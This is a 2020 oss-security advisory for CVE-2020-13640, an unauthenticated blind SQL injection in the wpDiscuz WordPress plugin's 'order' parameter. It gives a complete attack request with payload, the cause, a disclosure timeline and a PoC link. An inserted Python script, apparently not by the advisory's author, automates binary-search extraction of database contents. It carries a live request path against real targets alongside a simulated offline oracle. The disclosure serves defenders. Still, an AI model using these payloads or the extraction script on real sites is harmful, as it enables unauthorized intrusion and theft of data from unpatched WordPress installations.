Message-ID: <b97e9440-e032-2a1b-3c75-5f7688927fa7@seclab.cs.msu.su>
Date: Mon, 6 Jul 2020 02:13:39 +0300
From: asterite <asterite@...lab.cs.msu.su>
To: oss-security@...ts.openwall.com
Subject: CVE-2020-13640: WordPress Plugin wpDiscuz <= 5.3.5 SQL injection

There is an SQL injection in the wpDiscuz plugin [1], version 5.3.5 and earlier. The vulnerability is not present in the 7.x version line. The plugin vendor is gVectors [2]. The vulnerability can be exploited without authentication.

## Vulnerability Description ##

wpDiscuz is a plugin that works with comments. It has an endpoint, "wpdLoadMoreComments", that fetches the comments for a post with a given id. This endpoint is vulnerable to a boolean-based blind SQL injection in the "order" parameter: the injected payload ends up in the "ORDER BY" clause of the comment query. The server returns neither the output of the injected query nor the database error message, but an attacker can use an error-based binary oracle that tells whether the query succeeded: if the query fails with an error, the comment list in the response is empty; otherwise it contains the comments for the post whose id is given in the request. This means that, to exploit this vulnerability, an attacker needs a post with at least one comment (which is easily achievable, since sites usually have posts with comments and commenting is often enabled for non-logged-in users).
### Example of request with an attack vector: ###

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Content-Type: multipart/form-data; boundary=---------------------------14434359312532120894700338087
    Content-Length: 848
    Origin: http://localhost
    Connection: close

    -----------------------------14434359312532120894700338087
    Content-Disposition: form-data; name="action"

    wpdLoadMoreComments
    -----------------------------14434359312532120894700338087
    Content-Disposition: form-data; name="offset"

    1
    -----------------------------14434359312532120894700338087
    Content-Disposition: form-data; name="orderBy"

    comment_date_gmt
    -----------------------------14434359312532120894700338087
    Content-Disposition: form-data; name="order"

    , (select case when (ord(SUBSTRING((select SCHEMA_NAME from information_schema.schemata limit 1), 1, 1)) = 105) then 1 else 1*(select table_name from information_schema.tables)end)=1 asc #
    -----------------------------14434359312532120894700338087
    Content-Disposition: form-data; name="postId"

    1234
    -----------------------------14434359312532120894700338087--

Here, the injected query tests the character code of the first letter of the name of the first database in MySQL. Usually that database is "information_schema", so the first letter is "i" (code 105), the "case" expression evaluates to 1, the query succeeds, and the response contains the comments for the post. If the attacker instead uses the vector

    , (select case when (ord(SUBSTRING((select SCHEMA_NAME from information_schema.schemata limit 1), 1, 1)) = 106) then 1 else 1*(select table_name from information_schema.tables)end)=1 asc #

the check usually fails: the character code is compared with the wrong value 106, so the erroneous "else" branch of the "case" expression is evaluated. That branch multiplies by a subquery that returns many rows, which MySQL rejects because a scalar subquery may return only one row; the comment query errors out and the comment list in the response is empty.
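The oracle described above can be driven mechanically, one character at a time. The following Python script is an added example written for this page; it is not the author's PoC exploit and not code from the wpDiscuz project. It keeps the endpoint, the POST parameter names and the payload shape from the request above, but replaces the equality test ("= 105") with a "greater than" comparison so that each character code can be found by binary search instead of by trying every value. The live transport is built on urllib; because the advisory does not document the response format, the decision "did comments come back?" is left to a caller-supplied predicate. A constructed stand-in oracle that simulates a database whose first schema is "information_schema" lets the extraction loop run offline.

```python
"""Boolean-based blind extraction through the wpDiscuz "order" parameter.

Added example for this page (not the advisory author's exploit.py, not
wpDiscuz code). Endpoint, parameter names and payload shape follow the
advisory; the response-format predicate and the simulated oracle are
assumptions/constructed test scaffolding.
"""
import re
import urllib.request
import uuid
from typing import Callable

# An oracle takes a value for the "order" POST parameter and returns True when
# the response contained comments (injected query succeeded) and False when the
# comment list came back empty (injected query raised a database error).
Oracle = Callable[[str], bool]


def build_order_payload(subquery: str, pos: int, threshold: int) -> str:
    """Value for "order" that makes the comment query fail unless
    ord(character `pos` of the subquery result) > threshold.

    The advisory's payload tests equality; "> threshold" gives a binary
    search oracle. The ELSE branch multiplies by a subquery returning many
    rows, which MySQL rejects ("Subquery returns more than 1 row"), so the
    comment list is empty whenever the condition is false.
    """
    return (
        f", (select case when (ord(substring(({subquery}), {pos}, 1)) > {threshold})"
        f" then 1 else 1*(select table_name from information_schema.tables) end)=1 asc #"
    )


def extract_string(oracle: Oracle, subquery: str, max_len: int = 64) -> str:
    """Recover the single-row, single-column result of `subquery`.

    Searches the ASCII range 0..127 per position (raise `hi` for multi-byte
    charsets). Stops when the code is 0: MySQL's ORD() returns 0 for the
    empty string that SUBSTRING() yields past the end of the value.
    """
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # invariant: lo <= code <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(build_order_payload(subquery, pos, mid)):
                lo = mid + 1  # code > mid
            else:
                hi = mid      # code <= mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


def build_request(base_url: str, post_id: int, order_value: str) -> urllib.request.Request:
    """Multipart POST to admin-ajax.php shaped like the request in the advisory."""
    boundary = "----------------------------" + uuid.uuid4().hex
    fields = {
        "action": "wpdLoadMoreComments",
        "offset": "1",
        "orderBy": "comment_date_gmt",
        "order": order_value,
        "postId": str(post_id),
    }
    parts = [
        f"--{boundary}\r\nContent-Disposition: form-data; name=\"{name}\"\r\n\r\n{value}\r\n"
        for name, value in fields.items()
    ]
    body = ("".join(parts) + f"--{boundary}--\r\n").encode()
    return urllib.request.Request(
        base_url.rstrip("/") + "/wp-admin/admin-ajax.php",
        data=body,
        headers={"Content-Type": f"multipart/form-data; boundary={boundary}"},
        method="POST",
    )


def live_oracle(base_url: str, post_id: int, has_comments: Callable[[bytes], bool]) -> Oracle:
    """Oracle against a real target. `has_comments` must decide from the raw
    response body whether a non-empty comment list came back; the advisory
    does not document the response format, so that check is the caller's
    assumption, not something this example knows."""
    def oracle(order_value: str) -> bool:
        req = build_request(base_url, post_id, order_value)
        with urllib.request.urlopen(req, timeout=10) as resp:
            return has_comments(resp.read())
    return oracle


def simulated_oracle(secret: str) -> Oracle:
    """Constructed stand-in for a vulnerable server, used to run offline.
    Parses pos and threshold back out of the payload and answers the way
    MySQL would if the subquery's result were `secret`."""
    pattern = re.compile(r", (\d+), 1\)\) > (\d+)\)")

    def oracle(order_value: str) -> bool:
        m = pattern.search(order_value)
        if m is None:
            return False  # malformed payload: treat as a failed query
        pos, threshold = int(m.group(1)), int(m.group(2))
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0  # ORD('') = 0
        return code > threshold
    return oracle


if __name__ == "__main__":
    first_schema = "(select SCHEMA_NAME from information_schema.schemata limit 1)"
    # Offline demo; against a target you would pass live_oracle(...) instead.
    print(extract_string(simulated_oracle("information_schema"), first_schema))
```

Each recovered character costs about seven requests with the binary search, against up to 127 with the equality test in the advisory's payload; on a real target, `has_comments` is the only part that must be adapted to what the endpoint actually returns.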
For reference, the legitimate values of the "order" parameter are "asc" and "desc".

## Exploit ##

A PoC exploit can be found here: https://github.com/asterite3/CVE-2020-13640/blob/master/exploit.py

## Cause ##

Regarding the cause of the vulnerability: if I understood everything correctly, the reason is that the function "loadMoreComments()" in class.WpdiscuzCore.php takes "_POST['order']" unsanitized and puts it into "$args['order']", which, after several re-assignments into different variables/properties, gets appended to the "orderby" parameter in the "comments_clauses" hook [3] (in the "commentsClauses()" method of the "WpdiscuzCore" class). If I got it right, the values altered by the "comments_clauses" hook are put into the SQL query that fetches comments without further sanitization, so it is dangerous to let unsanitized user input reach them.

## Timeline (dd/mm/yyyy) ##

27/05/2020: Reported to vendor
27/05/2020: CVE assigned
29/05/2020: Reported to WordPress plugin team
29/05/2020: Got response from vendor
12/06/2020: Vendor publishes information about the vulnerability on the plugin site [4] and the WP plugin page [5]
12/06/2020: Patched version in the 5.x line (5.3.6) is released [6]

## References ##

[1] https://wordpress.org/plugins/wpdiscuz/
[2] https://gvectors.com/
[3] https://developer.wordpress.org/reference/hooks/comments_clauses/
[4] https://wpdiscuz.com/community/news/security-vulnerability-issue-in-5-3-5-please-udate/
[5] https://wordpress.org/plugins/wpdiscuz/#developers
[6] https://plugins.trac.wordpress.org/log/wpdiscuz/tags/5.3.6?rev=2335769